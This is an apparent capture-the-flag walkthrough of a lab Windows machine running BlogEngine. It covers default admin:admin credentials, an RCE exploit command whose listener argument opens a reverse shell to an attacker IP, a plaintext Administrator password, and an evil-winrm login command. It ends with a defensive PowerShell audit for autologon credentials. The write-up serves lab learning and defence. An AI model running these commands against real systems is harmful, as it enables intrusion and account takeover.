172.31.1.16

CyberSec Labs Engine Walkthrough

Port 80 open

Gobuster finds a directory /blog

It is the BlogEngine CMS, which is not configured properly and has the default creds admin:admin

There’s an RCE exploit available for the same

python exploit.py -t 172.31.1.16/blog -l 10.10.0.51:920

For the proxy, we can turn Burp Suite on and send the payload through it.

After running the exploit we get the shell back.

Running winPEAS, some autologin creds are found

Administrator:PzCEKhvj6gQMk7kA

Using evil-winrm we can get an admin shell

evil-winrm -u administrator -p "PzCEKhvj6gQMk7kA" -i 172.31.1.16

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

engine\administrator
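
The autologin credentials found above are what turned a web shell into an Administrator session. As an added example (not part of the original walkthrough), this PowerShell check lets an administrator find the same setting on their own hosts. It assumes the credentials sit in the standard Winlogon registry key, which the walkthrough does not name; the function name Get-AutoLogonFinding is hypothetical.

```powershell
# Added example: audit a host for plaintext autologon credentials.
# Assumption: the credentials are stored in the standard Winlogon registry
# key (the walkthrough does not say where winPEAS found them).
$paths = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon'
)

function Get-AutoLogonFinding {
    param([string[]]$Path = $paths)

    foreach ($p in $Path) {
        # The 32-bit view may not exist on every host.
        if (-not (Test-Path -Path $p)) { continue }
        $k = Get-ItemProperty -Path $p

        # A value that is not set comes back as $null, so both tests are safe.
        $enabled  = $k.AutoAdminLogon -eq '1'
        $hasPlain = -not [string]::IsNullOrEmpty($k.DefaultPassword)

        [pscustomobject]@{
            Key               = $p
            AutoAdminLogon    = $enabled
            DefaultDomainName = $k.DefaultDomainName
            DefaultUserName   = $k.DefaultUserName
            # Report only that a secret is present, never its value.
            PlaintextPassword = $hasPlain
        }
    }
}

$findings = Get-AutoLogonFinding
$findings | Format-Table -AutoSize

if ($findings | Where-Object PlaintextPassword) {
    Write-Warning ('Plaintext autologon password present: remove DefaultPassword, ' +
        'set AutoAdminLogon to 0 and rotate the account password.')
}
```

Any local user who can read that key can read the password, so a hit on an account that is also allowed to log in over WinRM is the path this walkthrough follows.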

Author

Sentinal920